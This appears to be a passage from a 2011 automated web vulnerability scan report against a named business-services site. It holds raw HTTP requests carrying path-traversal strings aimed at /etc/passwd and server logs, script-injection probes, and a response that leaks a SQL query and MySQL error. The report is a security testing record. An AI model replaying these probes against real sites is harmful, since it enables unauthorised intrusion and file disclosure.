Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=srlo2sh5h193cp3jcajuvk4qm5; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00058D)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST '"--></style></script><script>alert(0x000588)</script>
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 304
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000588)%3c%2fscript%3e&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:07 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4EDA6D8B898A67CB92544883112A3C07; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/lgds00/

/ppc/leadflow/lgds00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/?'"--></style></script><script>alert(0x000599)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000599)</script>

Request

GET /ppc/leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
